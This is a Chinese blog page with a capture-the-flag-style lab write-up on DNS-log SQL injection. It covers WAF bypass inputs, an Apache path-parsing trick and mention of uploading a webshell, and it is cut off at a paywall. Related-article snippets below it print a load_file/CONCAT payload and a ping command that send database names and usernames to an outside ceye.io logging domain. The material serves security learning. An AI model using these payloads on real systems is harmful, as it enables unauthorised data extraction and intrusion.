DNS-log注入(zkaq靶场)

最新推荐文章于 2024-10-16 18:44:42 发布
原创 最新推荐文章于 2024-10-16 18:44:42 发布 · 1.4k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql

本文介绍了黑客如何通过DNS-log注入和Apache解析特性绕过WAF,从数据库中提取信息并利用intooutfile函数上传木马获取shell,最终找到flag的过程。涉及的知识点包括MySQL安全设置、文件共享、Apache解析漏洞和SQL注入技巧。

知识点:

1.dns-log注入,是用sql语句的load_file()函数[读取文件]来进行的,在高版本的mysql是默认禁用这个函数的,所以要在mysql.ini加入secure_file_priv=来解除限制。

2.同一局域网通过UNC路径进行文件访问,利用的是smb【文件共享服务】,其支持域名和ip。

3.apache解析特性:1.php/1.txt会认为1.php是文件夹,1.txt是文件内容,但是因为找不到这个文件夹,所以会把这一坨当做1.php来解决【绕waf】

4.into outfile函数,into dumpfile函数

首先看靶场

 

 当我传参?id=1 and 1=1 时,会被拦截

 

 尝试绕过:

1:?id=1 and 1 like 1[失败]

2:?id=1 and -1=-1[成功] 存在注入点

3:利用apache解析特性 xx.php/1.txt?id=1 and 1=1 [成功]

这里获得数据有两种方法

1.dns-log注入

2.上传一句话木马获得shell

1. dns-log注入

我使用的dns-log平台为:ceye.io

最低0.47元/天 解锁文章
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2114
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
【新手入门】SQL注入DNSlog注入
最新发布
2401_89344791的博客
02-28 550
注入,无回显,采用DNSlog注入手段通过注入一个A网站网址让目标主机触发网址的访问,将敏感信息携带到请求数据中,A网站记录下本次请求,在日志中就能看到目标主机的敏感数据了。
利用 DNSLog无回显注入
故事讲予风听
07-18 973
基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。无回显注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无回显注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。通常,注入点位于应用程序的输入字段中。触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击。
Injection Attacks-Log 注入
weixin_34272308的博客
03-11 444
日志注入(也称日志文件注入) 很多应用都维护着一系列面向授权用户、通过 HTML 界面展示的日志,因而成为了攻击者的首要目标,这些攻击者试图伪装其他攻击、误导日志读者,甚至对阅读和分析日志监测应用的用户安装后续攻击程序。 日志的脆弱性取决于对日志编写过程的控制,以及是否确保对日志条目进行任何监控或分析时,日志数据被看作非置信数据源。 简单的日志系统可能...
代码安全系列(1) - Log注入
weixin_33868027的博客
12-15 355
简介 我们编写了大量的程序,但程序总是出现莫名其妙的异常,因此我们使用日志模块,详细记录程序执行的步骤,以求追踪和定位问题。也许这是大多数程序员对日志的理解,跟踪和调试程序成了日志的主要职责。其实,日志的作用远非如此,当某天突然发现我们的系统被人非法入侵,删除了大量用户资料时,我们记录的日志成了最好的追踪骇客的工具。假如,我们的日志被骇客无情的篡改,后果将不堪设想。因此,日志模块虽小,安全性却尤...
掌控者靶场DNS-Log注入过程
zhaoxz1985的博客
07-15 1073
这里写自定义目录标题掌控者靶场DNS-Log注入过程0x01 前言0x02 利用思路0x03 靶场实战第一步:探测数据库名第二步:探测数据表名第三步:探测数据表对应的列名第四步:瞎逼懵0x04 写在最后 掌控者靶场DNS-Log注入过程 以下过程是在听取了线上课程后,结合自身经验,完成的靶场练习,若过程中有错误,还请大佬指正。 0x01 前言 DNS-LogDNS是域名解析系统,说直白点就是机器名和IP地址转换。 DNS-Log,增加了一个log,也就是增加了一个日志记录,只不过记录的DNS的域名解析
【sqlmap渗透进阶】DNS-domain注入
记录学习,一起进步
03-18 1414
【sqlmap渗透进阶】DNS-domain注入
DNS_LOG注入
学习、分享、交流
05-19 1764
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
SSRF-labs-master靶场
weixin_68416970的博客
07-30 1005
SSRF-labs-master靶场
DNSLOG 注入
qq_33441500的博客
10-21 820
DNSLOG 注入 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获...
特别的sql注入方式-DNSlog注入--安鸾靶场练习 DNSlog注入学习
AAAAAAAAAAAA66的博客
01-05 2395
DNSlog注入 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 利用的场景 存在sql注入 无法获得回显 对目标网站可以发起请求 简单的来说就是可以利用 load_file() 函数,在存在注入的情况下将数据库中的信息带出我们的域名日志中(dnslog).详细的可以看下方链接 DNSLogMySQL注入
DNSLog注入笔记
weixin_30781433的博客
09-12 907
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入。具体原理如下。 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样...
dnslog注入
qq_40039615的博客
06-11 282
首先 ceye是一个网站 不是一个应用程序 http://ceye.io 这个是他的网址 操作: ping %USERNAME%.b182oj.ceye.io curl sk7s6n.ceye.io 核心语法:Loadfile 函数只能在windows操作系统执行,所以目标一定要是windows操作系统 SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.sk7s6n.ceye.io\\test')); 官方.
DNSLog注入
2302_81322786的博客
10-16 257
首先需要有一个可以配置的域名,比如:xxx.io,然后通过代理商设置域名 xxx.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 xxx.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了。在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入
DNSlog注入
7Riven's blog
12-31 1047
DNSlog注入产生 测试一些网站的时候,一些注入都是无回显的,可以通过写脚本来进行盲注,但有些网站会ban掉我们的ip,可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSlog注入应用场景 sql注入的盲注、无回显的命令执行、无回显的SSRF DNSlog注入原理 有一个可以配置的域名(比如:ceye.io),然后通过代理商设置域名(ceye.io)...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v2ish1yan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值